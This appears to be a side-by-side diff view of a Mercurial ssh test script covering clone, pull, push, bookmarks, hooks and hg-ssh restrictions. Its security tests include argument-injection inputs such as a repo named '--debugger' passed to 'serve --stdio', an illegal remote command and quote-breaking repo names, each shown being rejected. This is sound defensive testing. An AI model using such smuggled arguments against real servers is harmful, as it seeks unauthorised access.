84 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
85 $ cd stream2
85 $ cd stream2
86 $ hg book
86 $ hg book
87 mybook 0:1160648e36ce
87 mybook 0:1160648e36ce
88 $ cd ..
88 $ cd ..
89 $ rm -rf local-stream stream2
89 $ rm -rf local-stream stream2
90
90
91 clone remote via pull
91 clone remote via pull
92
92
93 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote local
93 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote local
94 requesting all changes
94 requesting all changes
95 adding changesets
95 adding changesets
96 adding manifests
96 adding manifests
97 adding file changes
97 adding file changes
98 added 3 changesets with 2 changes to 2 files
98 added 3 changesets with 2 changes to 2 files
99 updating to branch default
99 updating to branch default
100 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
100 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
101
101
102 verify
102 verify
103
103
104 $ cd local
104 $ cd local
105 $ hg verify
105 $ hg verify
106 checking changesets
106 checking changesets
107 checking manifests
107 checking manifests
108 crosschecking files in changesets and manifests
108 crosschecking files in changesets and manifests
109 checking files
109 checking files
110 2 files, 3 changesets, 2 total revisions
110 2 files, 3 changesets, 2 total revisions
111 $ cat >> .hg/hgrc <<EOF
111 $ cat >> .hg/hgrc <<EOF
112 > [hooks]
112 > [hooks]
113 > changegroup = sh -c "printenv.py changegroup-in-local 0 ../dummylog"
113 > changegroup = sh -c "printenv.py changegroup-in-local 0 ../dummylog"
114 > EOF
114 > EOF
115
115
116 empty default pull
116 empty default pull
117
117
118 $ hg paths
118 $ hg paths
119 default = ssh://user@dummy/remote
119 default = ssh://user@dummy/remote
120 $ hg pull -e "\"$PYTHON\" \"$TESTDIR/dummyssh\""
120 $ hg pull -e "\"$PYTHON\" \"$TESTDIR/dummyssh\""
121 pulling from ssh://user@dummy/remote
121 pulling from ssh://user@dummy/remote
122 searching for changes
122 searching for changes
123 no changes found
123 no changes found
124
124
125 pull from wrong ssh URL
125 pull from wrong ssh URL
126
126
127 $ hg pull -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/doesnotexist
127 $ hg pull -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/doesnotexist
128 pulling from ssh://user@dummy/doesnotexist
128 pulling from ssh://user@dummy/doesnotexist
129 remote: abort: repository doesnotexist not found!
129 remote: abort: repository doesnotexist not found!
130 abort: no suitable response from remote hg!
130 abort: no suitable response from remote hg!
131 [255]
131 [255]
132
132
133 local change
133 local change
134
134
135 $ echo bleah > foo
135 $ echo bleah > foo
136 $ hg ci -m "add"
136 $ hg ci -m "add"
137
137
138 updating rc
138 updating rc
139
139
140 $ echo "default-push = ssh://user@dummy/remote" >> .hg/hgrc
140 $ echo "default-push = ssh://user@dummy/remote" >> .hg/hgrc
141 $ echo "[ui]" >> .hg/hgrc
141 $ echo "[ui]" >> .hg/hgrc
142 $ echo "ssh = \"$PYTHON\" \"$TESTDIR/dummyssh\"" >> .hg/hgrc
142 $ echo "ssh = \"$PYTHON\" \"$TESTDIR/dummyssh\"" >> .hg/hgrc
143
143
144 find outgoing
144 find outgoing
145
145
146 $ hg out ssh://user@dummy/remote
146 $ hg out ssh://user@dummy/remote
147 comparing with ssh://user@dummy/remote
147 comparing with ssh://user@dummy/remote
148 searching for changes
148 searching for changes
149 changeset: 3:a28a9d1a809c
149 changeset: 3:a28a9d1a809c
150 tag: tip
150 tag: tip
151 parent: 0:1160648e36ce
151 parent: 0:1160648e36ce
152 user: test
152 user: test
153 date: Thu Jan 01 00:00:00 1970 +0000
153 date: Thu Jan 01 00:00:00 1970 +0000
154 summary: add
154 summary: add
155
155
156
156
157 find incoming on the remote side
157 find incoming on the remote side
158
158
159 $ hg incoming -R ../remote -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/local
159 $ hg incoming -R ../remote -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/local
160 comparing with ssh://user@dummy/local
160 comparing with ssh://user@dummy/local
161 searching for changes
161 searching for changes
162 changeset: 3:a28a9d1a809c
162 changeset: 3:a28a9d1a809c
163 tag: tip
163 tag: tip
164 parent: 0:1160648e36ce
164 parent: 0:1160648e36ce
165 user: test
165 user: test
166 date: Thu Jan 01 00:00:00 1970 +0000
166 date: Thu Jan 01 00:00:00 1970 +0000
167 summary: add
167 summary: add
168
168
169
169
170 find incoming on the remote side (using absolute path)
170 find incoming on the remote side (using absolute path)
171
171
172 $ hg incoming -R ../remote -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/`pwd`"
172 $ hg incoming -R ../remote -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/`pwd`"
173 comparing with ssh://user@dummy/$TESTTMP/local
173 comparing with ssh://user@dummy/$TESTTMP/local
174 searching for changes
174 searching for changes
175 changeset: 3:a28a9d1a809c
175 changeset: 3:a28a9d1a809c
176 tag: tip
176 tag: tip
177 parent: 0:1160648e36ce
177 parent: 0:1160648e36ce
178 user: test
178 user: test
179 date: Thu Jan 01 00:00:00 1970 +0000
179 date: Thu Jan 01 00:00:00 1970 +0000
180 summary: add
180 summary: add
181
181
182
182
183 push
183 push
184
184
185 $ hg push
185 $ hg push
186 pushing to ssh://user@dummy/remote
186 pushing to ssh://user@dummy/remote
187 searching for changes
187 searching for changes
188 remote: adding changesets
188 remote: adding changesets
189 remote: adding manifests
189 remote: adding manifests
190 remote: adding file changes
190 remote: adding file changes
191 remote: added 1 changesets with 1 changes to 1 files
191 remote: added 1 changesets with 1 changes to 1 files
192 $ cd ../remote
192 $ cd ../remote
193
193
194 check remote tip
194 check remote tip
195
195
196 $ hg tip
196 $ hg tip
197 changeset: 3:a28a9d1a809c
197 changeset: 3:a28a9d1a809c
198 tag: tip
198 tag: tip
199 parent: 0:1160648e36ce
199 parent: 0:1160648e36ce
200 user: test
200 user: test
201 date: Thu Jan 01 00:00:00 1970 +0000
201 date: Thu Jan 01 00:00:00 1970 +0000
202 summary: add
202 summary: add
203
203
204 $ hg verify
204 $ hg verify
205 checking changesets
205 checking changesets
206 checking manifests
206 checking manifests
207 crosschecking files in changesets and manifests
207 crosschecking files in changesets and manifests
208 checking files
208 checking files
209 2 files, 4 changesets, 3 total revisions
209 2 files, 4 changesets, 3 total revisions
210 $ hg cat -r tip foo
210 $ hg cat -r tip foo
211 bleah
211 bleah
212 $ echo z > z
212 $ echo z > z
213 $ hg ci -A -m z z
213 $ hg ci -A -m z z
214 created new head
214 created new head
215
215
216 test pushkeys and bookmarks
216 test pushkeys and bookmarks
217
217
218 $ cd ../local
218 $ cd ../local
219 $ hg debugpushkey --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote namespaces
219 $ hg debugpushkey --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote namespaces
220 bookmarks
220 bookmarks
221 namespaces
221 namespaces
222 phases
222 phases
223 $ hg book foo -r 0
223 $ hg book foo -r 0
224 $ hg out -B
224 $ hg out -B
225 comparing with ssh://user@dummy/remote
225 comparing with ssh://user@dummy/remote
226 searching for changed bookmarks
226 searching for changed bookmarks
227 foo 1160648e36ce
227 foo 1160648e36ce
228 $ hg push -B foo
228 $ hg push -B foo
229 pushing to ssh://user@dummy/remote
229 pushing to ssh://user@dummy/remote
230 searching for changes
230 searching for changes
231 no changes found
231 no changes found
232 exporting bookmark foo
232 exporting bookmark foo
233 [1]
233 [1]
234 $ hg debugpushkey --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote bookmarks
234 $ hg debugpushkey --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote bookmarks
235 foo 1160648e36cec0054048a7edc4110c6f84fde594
235 foo 1160648e36cec0054048a7edc4110c6f84fde594
236 $ hg book -f foo
236 $ hg book -f foo
237 $ hg push --traceback
237 $ hg push --traceback
238 pushing to ssh://user@dummy/remote
238 pushing to ssh://user@dummy/remote
239 searching for changes
239 searching for changes
240 no changes found
240 no changes found
241 updating bookmark foo
241 updating bookmark foo
242 [1]
242 [1]
243 $ hg book -d foo
243 $ hg book -d foo
244 $ hg in -B
244 $ hg in -B
245 comparing with ssh://user@dummy/remote
245 comparing with ssh://user@dummy/remote
246 searching for changed bookmarks
246 searching for changed bookmarks
247 foo a28a9d1a809c
247 foo a28a9d1a809c
248 $ hg book -f -r 0 foo
248 $ hg book -f -r 0 foo
249 $ hg pull -B foo
249 $ hg pull -B foo
250 pulling from ssh://user@dummy/remote
250 pulling from ssh://user@dummy/remote
251 no changes found
251 no changes found
252 updating bookmark foo
252 updating bookmark foo
253 $ hg book -d foo
253 $ hg book -d foo
254 $ hg push -B foo
254 $ hg push -B foo
255 pushing to ssh://user@dummy/remote
255 pushing to ssh://user@dummy/remote
256 searching for changes
256 searching for changes
257 no changes found
257 no changes found
258 deleting remote bookmark foo
258 deleting remote bookmark foo
259 [1]
259 [1]
260
260
261 a bad, evil hook that prints to stdout
261 a bad, evil hook that prints to stdout
262
262
263 $ cat <<EOF > $TESTTMP/badhook
263 $ cat <<EOF > $TESTTMP/badhook
264 > import sys
264 > import sys
265 > sys.stdout.write("KABOOM\n")
265 > sys.stdout.write("KABOOM\n")
266 > EOF
266 > EOF
267
267
268 $ cat <<EOF > $TESTTMP/badpyhook.py
268 $ cat <<EOF > $TESTTMP/badpyhook.py
269 > import sys
269 > import sys
270 > def hook(ui, repo, hooktype, **kwargs):
270 > def hook(ui, repo, hooktype, **kwargs):
271 > sys.stdout.write("KABOOM IN PROCESS\n")
271 > sys.stdout.write("KABOOM IN PROCESS\n")
272 > EOF
272 > EOF
273
273
274 $ cat <<EOF >> ../remote/.hg/hgrc
274 $ cat <<EOF >> ../remote/.hg/hgrc
275 > [hooks]
275 > [hooks]
276 > changegroup.stdout = $PYTHON $TESTTMP/badhook
276 > changegroup.stdout = $PYTHON $TESTTMP/badhook
277 > changegroup.pystdout = python:$TESTTMP/badpyhook.py:hook
277 > changegroup.pystdout = python:$TESTTMP/badpyhook.py:hook
278 > EOF
278 > EOF
279 $ echo r > r
279 $ echo r > r
280 $ hg ci -A -m z r
280 $ hg ci -A -m z r
281
281
282 push should succeed even though it has an unexpected response
282 push should succeed even though it has an unexpected response
283
283
284 $ hg push
284 $ hg push
285 pushing to ssh://user@dummy/remote
285 pushing to ssh://user@dummy/remote
286 searching for changes
286 searching for changes
287 remote has heads on branch 'default' that are not known locally: 6c0482d977a3
287 remote has heads on branch 'default' that are not known locally: 6c0482d977a3
288 remote: adding changesets
288 remote: adding changesets
289 remote: adding manifests
289 remote: adding manifests
290 remote: adding file changes
290 remote: adding file changes
291 remote: added 1 changesets with 1 changes to 1 files
291 remote: added 1 changesets with 1 changes to 1 files
292 remote: KABOOM
292 remote: KABOOM
293 remote: KABOOM IN PROCESS
293 remote: KABOOM IN PROCESS
294 $ hg -R ../remote heads
294 $ hg -R ../remote heads
295 changeset: 5:1383141674ec
295 changeset: 5:1383141674ec
296 tag: tip
296 tag: tip
297 parent: 3:a28a9d1a809c
297 parent: 3:a28a9d1a809c
298 user: test
298 user: test
299 date: Thu Jan 01 00:00:00 1970 +0000
299 date: Thu Jan 01 00:00:00 1970 +0000
300 summary: z
300 summary: z
301
301
302 changeset: 4:6c0482d977a3
302 changeset: 4:6c0482d977a3
303 parent: 0:1160648e36ce
303 parent: 0:1160648e36ce
304 user: test
304 user: test
305 date: Thu Jan 01 00:00:00 1970 +0000
305 date: Thu Jan 01 00:00:00 1970 +0000
306 summary: z
306 summary: z
307
307
308
308
309 clone bookmarks
309 clone bookmarks
310
310
311 $ hg -R ../remote bookmark test
311 $ hg -R ../remote bookmark test
312 $ hg -R ../remote bookmarks
312 $ hg -R ../remote bookmarks
313 * test 4:6c0482d977a3
313 * test 4:6c0482d977a3
314 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote local-bookmarks
314 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote local-bookmarks
315 requesting all changes
315 requesting all changes
316 adding changesets
316 adding changesets
317 adding manifests
317 adding manifests
318 adding file changes
318 adding file changes
319 added 6 changesets with 5 changes to 4 files (+1 heads)
319 added 6 changesets with 5 changes to 4 files (+1 heads)
320 updating to branch default
320 updating to branch default
321 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
321 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
322 $ hg -R local-bookmarks bookmarks
322 $ hg -R local-bookmarks bookmarks
323 test 4:6c0482d977a3
323 test 4:6c0482d977a3
324
324
325 passwords in ssh urls are not supported
325 passwords in ssh urls are not supported
326 (we use a glob here because different Python versions give different
326 (we use a glob here because different Python versions give different
327 results here)
327 results here)
328
328
329 $ hg push ssh://user:erroneouspwd@dummy/remote
329 $ hg push ssh://user:erroneouspwd@dummy/remote
330 pushing to ssh://user:*@dummy/remote (glob)
330 pushing to ssh://user:*@dummy/remote (glob)
331 abort: password in URL not supported!
331 abort: password in URL not supported!
332 [255]
332 [255]
333
333
334 $ cd ..
334 $ cd ..
335
335
336 hide outer repo
336 hide outer repo
337 $ hg init
337 $ hg init
338
338
339 Test remote paths with spaces (issue2983):
339 Test remote paths with spaces (issue2983):
340
340
341 $ hg init --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
341 $ hg init --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
342 $ touch "$TESTTMP/a repo/test"
342 $ touch "$TESTTMP/a repo/test"
343 $ hg -R 'a repo' commit -A -m "test"
343 $ hg -R 'a repo' commit -A -m "test"
344 adding test
344 adding test
345 $ hg -R 'a repo' tag tag
345 $ hg -R 'a repo' tag tag
346 $ hg id --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
346 $ hg id --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
347 73649e48688a
347 73649e48688a
348
348
349 $ hg id --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo#noNoNO"
349 $ hg id --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo#noNoNO"
350 abort: unknown revision 'noNoNO'!
350 abort: unknown revision 'noNoNO'!
351 [255]
351 [255]
352
352
353 Test (non-)escaping of remote paths with spaces when cloning (issue3145):
353 Test (non-)escaping of remote paths with spaces when cloning (issue3145):
354
354
355 $ hg clone --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
355 $ hg clone --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
356 destination directory: a repo
356 destination directory: a repo
357 abort: destination 'a repo' is not empty
357 abort: destination 'a repo' is not empty
358 [255]
358 [255]
359
359
360 Make sure hg is really paranoid in serve --stdio mode. It used to be
360 Make sure hg is really paranoid in serve --stdio mode. It used to be
361 possible to get a debugger REPL by specifying a repo named --debugger.
361 possible to get a debugger REPL by specifying a repo named --debugger.
362 $ hg -R --debugger serve --stdio
362 $ hg -R --debugger serve --stdio
363 abort: potentially unsafe serve --stdio invocation: ['-R', '--debugger', 'serve', '--stdio']
363 abort: potentially unsafe serve --stdio invocation: ['-R', '--debugger', 'serve', '--stdio']
364 [255]
364 [255]
365 $ hg -R --config=ui.debugger=yes serve --stdio
365 $ hg -R --config=ui.debugger=yes serve --stdio
366 abort: potentially unsafe serve --stdio invocation: ['-R', '--config=ui.debugger=yes', 'serve', '--stdio']
366 abort: potentially unsafe serve --stdio invocation: ['-R', '--config=ui.debugger=yes', 'serve', '--stdio']
367 [255]
367 [255]
368 Abbreviations of 'serve' also don't work, to avoid shenanigans.
368 Abbreviations of 'serve' also don't work, to avoid shenanigans.
369 $ hg -R narf serv --stdio
369 $ hg -R narf serv --stdio
370 abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio']
370 abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio']
371 [255]
371 [255]
372
372
373 Test hg-ssh using a helper script that will restore PYTHONPATH (which might
373 Test hg-ssh using a helper script that will restore PYTHONPATH (which might
374 have been cleared by a hg.exe wrapper) and invoke hg-ssh with the right
374 have been cleared by a hg.exe wrapper) and invoke hg-ssh with the right
375 parameters:
375 parameters:
376
376
377 $ cat > ssh.sh << EOF
377 $ cat > ssh.sh << EOF
378 > userhost="\$1"
378 > userhost="\$1"
379 > SSH_ORIGINAL_COMMAND="\$2"
379 > SSH_ORIGINAL_COMMAND="\$2"
380 > export SSH_ORIGINAL_COMMAND
380 > export SSH_ORIGINAL_COMMAND
381 > PYTHONPATH="$PYTHONPATH"
381 > PYTHONPATH="$PYTHONPATH"
382 > export PYTHONPATH
382 > export PYTHONPATH
383 > "$PYTHON" "$TESTDIR/../contrib/hg-ssh" "$TESTTMP/a repo"
383 > "$PYTHON" "$TESTDIR/../contrib/hg-ssh" "$TESTTMP/a repo"
384 > EOF
384 > EOF
385
385
386 $ hg id --ssh "sh ssh.sh" "ssh://user@dummy/a repo"
386 $ hg id --ssh "sh ssh.sh" "ssh://user@dummy/a repo"
387 73649e48688a
387 73649e48688a
388
388
389 $ hg id --ssh "sh ssh.sh" "ssh://user@dummy/a'repo"
389 $ hg id --ssh "sh ssh.sh" "ssh://user@dummy/a'repo"
390 remote: Illegal repository "$TESTTMP/a'repo" (glob)
390 remote: Illegal repository "$TESTTMP/a'repo" (glob)
391 abort: no suitable response from remote hg!
391 abort: no suitable response from remote hg!
392 [255]
392 [255]
393
393
394 $ hg id --ssh "sh ssh.sh" --remotecmd hacking "ssh://user@dummy/a'repo"
394 $ hg id --ssh "sh ssh.sh" --remotecmd hacking "ssh://user@dummy/a'repo"
395 remote: Illegal command "hacking -R 'a'\''repo' serve --stdio"
395 remote: Illegal command "hacking -R 'a'\''repo' serve --stdio"
396 abort: no suitable response from remote hg!
396 abort: no suitable response from remote hg!
397 [255]
397 [255]
398
398
399 $ SSH_ORIGINAL_COMMAND="'hg' -R 'a'repo' serve --stdio" $PYTHON "$TESTDIR/../contrib/hg-ssh"
399 $ SSH_ORIGINAL_COMMAND="'hg' -R 'a'repo' serve --stdio" $PYTHON "$TESTDIR/../contrib/hg-ssh"
400 Illegal command "'hg' -R 'a'repo' serve --stdio": No closing quotation
400 Illegal command "'hg' -R 'a'repo' serve --stdio": No closing quotation
401 [255]
401 [255]
402
402
403 Test hg-ssh in read-only mode:
403 Test hg-ssh in read-only mode:
404
404
405 $ cat > ssh.sh << EOF
405 $ cat > ssh.sh << EOF
406 > userhost="\$1"
406 > userhost="\$1"
407 > SSH_ORIGINAL_COMMAND="\$2"
407 > SSH_ORIGINAL_COMMAND="\$2"
408 > export SSH_ORIGINAL_COMMAND
408 > export SSH_ORIGINAL_COMMAND
409 > PYTHONPATH="$PYTHONPATH"
409 > PYTHONPATH="$PYTHONPATH"
410 > export PYTHONPATH
410 > export PYTHONPATH
411 > "$PYTHON" "$TESTDIR/../contrib/hg-ssh" --read-only "$TESTTMP/remote"
411 > "$PYTHON" "$TESTDIR/../contrib/hg-ssh" --read-only "$TESTTMP/remote"
412 > EOF
412 > EOF
413
413
414 $ hg clone --ssh "sh ssh.sh" "ssh://user@dummy/$TESTTMP/remote" read-only-local
414 $ hg clone --ssh "sh ssh.sh" "ssh://user@dummy/$TESTTMP/remote" read-only-local
415 requesting all changes
415 requesting all changes
416 adding changesets
416 adding changesets
417 adding manifests
417 adding manifests
418 adding file changes
418 adding file changes
419 added 6 changesets with 5 changes to 4 files (+1 heads)
419 added 6 changesets with 5 changes to 4 files (+1 heads)
420 updating to branch default
420 updating to branch default
421 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
421 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
422
422
423 $ cd read-only-local
423 $ cd read-only-local
424 $ echo "baz" > bar
424 $ echo "baz" > bar
425 $ hg ci -A -m "unpushable commit" bar
425 $ hg ci -A -m "unpushable commit" bar
426 $ hg push --ssh "sh ../ssh.sh"
426 $ hg push --ssh "sh ../ssh.sh"
427 pushing to ssh://user@dummy/*/remote (glob)
427 pushing to ssh://user@dummy/*/remote (glob)
428 searching for changes
428 searching for changes
429 remote: Permission denied
429 remote: Permission denied
430 remote: pretxnopen.hg-ssh hook failed
430 remote: pretxnopen.hg-ssh hook failed
431 abort: push failed on remote
431 abort: push failed on remote
432 [255]
432 [255]
433
433
434 $ cd ..
434 $ cd ..
435
435
436 stderr from remote commands should be printed before stdout from local code (issue4336)
436 stderr from remote commands should be printed before stdout from local code (issue4336)
437
437
438 $ hg clone remote stderr-ordering
438 $ hg clone remote stderr-ordering
439 updating to branch default
439 updating to branch default
440 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
440 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
441 $ cd stderr-ordering
441 $ cd stderr-ordering
442 $ cat >> localwrite.py << EOF
442 $ cat >> localwrite.py << EOF
443 > from mercurial import exchange, extensions
443 > from mercurial import exchange, extensions
444 >
444 >
445 > def wrappedpush(orig, repo, *args, **kwargs):
445 > def wrappedpush(orig, repo, *args, **kwargs):
446 > res = orig(repo, *args, **kwargs)
446 > res = orig(repo, *args, **kwargs)
447 > repo.ui.write('local stdout\n')
447 > repo.ui.write('local stdout\n')
448 > return res
448 > return res
449 >
449 >
450 > def extsetup(ui):
450 > def extsetup(ui):
451 > extensions.wrapfunction(exchange, 'push', wrappedpush)
451 > extensions.wrapfunction(exchange, 'push', wrappedpush)
452 > EOF
452 > EOF
453
453
454 $ cat >> .hg/hgrc << EOF
454 $ cat >> .hg/hgrc << EOF
455 > [paths]
455 > [paths]
456 > default-push = ssh://user@dummy/remote
456 > default-push = ssh://user@dummy/remote
457 > [ui]
457 > [ui]
458 > ssh = "$PYTHON" "$TESTDIR/dummyssh"
458 > ssh = "$PYTHON" "$TESTDIR/dummyssh"
459 > [extensions]
459 > [extensions]
460 > localwrite = localwrite.py
460 > localwrite = localwrite.py
461 > EOF
461 > EOF
462
462
463 $ echo localwrite > foo
463 $ echo localwrite > foo
464 $ hg commit -m 'testing localwrite'
464 $ hg commit -m 'testing localwrite'
465 $ hg push
465 $ hg push
466 pushing to ssh://user@dummy/remote
466 pushing to ssh://user@dummy/remote
467 searching for changes
467 searching for changes
468 remote: adding changesets
468 remote: adding changesets
469 remote: adding manifests
469 remote: adding manifests
470 remote: adding file changes
470 remote: adding file changes
471 remote: added 1 changesets with 1 changes to 1 files
471 remote: added 1 changesets with 1 changes to 1 files
472 remote: KABOOM
472 remote: KABOOM
473 remote: KABOOM IN PROCESS
473 remote: KABOOM IN PROCESS
474 local stdout
474 local stdout
475
475
476 debug output
476 debug output
477
477
478 $ hg pull --debug ssh://user@dummy/remote
478 $ hg pull --debug ssh://user@dummy/remote
479 pulling from ssh://user@dummy/remote
479 pulling from ssh://user@dummy/remote
480 running .* ".*/dummyssh" user@dummy ('|")hg -R remote serve --stdio('|") (re)
480 running .* ".*/dummyssh" ['"]user@dummy['"] ('|")hg -R remote serve --stdio('|") (re)
481 sending hello command
481 sending hello command
482 sending between command
482 sending between command
483 remote: 355
483 remote: 355
484 remote: capabilities: lookup changegroupsubset branchmap pushkey known getbundle unbundlehash batch streamreqs=generaldelta,revlogv1 bundle2=HG20%0Achangegroup%3D01%2C02%0Adigests%3Dmd5%2Csha1%2Csha512%0Aerror%3Dabort%2Cunsupportedcontent%2Cpushraced%2Cpushkey%0Ahgtagsfnodes%0Alistkeys%0Apushkey%0Aremote-changegroup%3Dhttp%2Chttps unbundle=HG10GZ,HG10BZ,HG10UN
484 remote: capabilities: lookup changegroupsubset branchmap pushkey known getbundle unbundlehash batch streamreqs=generaldelta,revlogv1 bundle2=HG20%0Achangegroup%3D01%2C02%0Adigests%3Dmd5%2Csha1%2Csha512%0Aerror%3Dabort%2Cunsupportedcontent%2Cpushraced%2Cpushkey%0Ahgtagsfnodes%0Alistkeys%0Apushkey%0Aremote-changegroup%3Dhttp%2Chttps unbundle=HG10GZ,HG10BZ,HG10UN
485 remote: 1
485 remote: 1
486 query 1; heads
486 query 1; heads
487 sending batch command
487 sending batch command
488 searching for changes
488 searching for changes
489 all remote heads known locally
489 all remote heads known locally
490 no changes found
490 no changes found
491 sending getbundle command
491 sending getbundle command
492 bundle2-input-bundle: with-transaction
492 bundle2-input-bundle: with-transaction
493 bundle2-input-part: "listkeys" (params: 1 mandatory) supported
493 bundle2-input-part: "listkeys" (params: 1 mandatory) supported
494 bundle2-input-part: total payload size 15
494 bundle2-input-part: total payload size 15
495 bundle2-input-part: "listkeys" (params: 1 mandatory) supported
495 bundle2-input-part: "listkeys" (params: 1 mandatory) supported
496 bundle2-input-part: total payload size 45
496 bundle2-input-part: total payload size 45
497 bundle2-input-bundle: 1 parts total
497 bundle2-input-bundle: 1 parts total
498 checking for updated bookmarks
498 checking for updated bookmarks
499
499
500 $ cd ..
500 $ cd ..
501
501
502 $ cat dummylog
502 $ cat dummylog
503 Got arguments 1:user@dummy 2:hg -R nonexistent serve --stdio
503 Got arguments 1:user@dummy 2:hg -R nonexistent serve --stdio
504 Got arguments 1:user@dummy 2:hg -R $TESTTMP/nonexistent serve --stdio
504 Got arguments 1:user@dummy 2:hg -R $TESTTMP/nonexistent serve --stdio
505 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
505 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
506 Got arguments 1:user@dummy 2:hg -R local-stream serve --stdio
506 Got arguments 1:user@dummy 2:hg -R local-stream serve --stdio
507 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
507 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
508 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
508 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
509 Got arguments 1:user@dummy 2:hg -R doesnotexist serve --stdio
509 Got arguments 1:user@dummy 2:hg -R doesnotexist serve --stdio
510 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
510 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
511 Got arguments 1:user@dummy 2:hg -R local serve --stdio
511 Got arguments 1:user@dummy 2:hg -R local serve --stdio
512 Got arguments 1:user@dummy 2:hg -R $TESTTMP/local serve --stdio
512 Got arguments 1:user@dummy 2:hg -R $TESTTMP/local serve --stdio
513 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
513 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
514 changegroup-in-remote hook: HG_BUNDLE2=1 HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=a28a9d1a809cab7d4e2fde4bee738a9ede948b60 HG_NODE_LAST=a28a9d1a809cab7d4e2fde4bee738a9ede948b60 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
514 changegroup-in-remote hook: HG_BUNDLE2=1 HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=a28a9d1a809cab7d4e2fde4bee738a9ede948b60 HG_NODE_LAST=a28a9d1a809cab7d4e2fde4bee738a9ede948b60 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
515 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
515 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
516 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
516 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
517 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
517 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
518 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
518 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
519 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
519 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
520 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
520 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
521 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
521 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
522 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
522 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
523 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
523 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
524 changegroup-in-remote hook: HG_BUNDLE2=1 HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=1383141674ec756a6056f6a9097618482fe0f4a6 HG_NODE_LAST=1383141674ec756a6056f6a9097618482fe0f4a6 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
524 changegroup-in-remote hook: HG_BUNDLE2=1 HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=1383141674ec756a6056f6a9097618482fe0f4a6 HG_NODE_LAST=1383141674ec756a6056f6a9097618482fe0f4a6 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
525 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
525 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
526 Got arguments 1:user@dummy 2:hg init 'a repo'
526 Got arguments 1:user@dummy 2:hg init 'a repo'
527 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
527 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
528 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
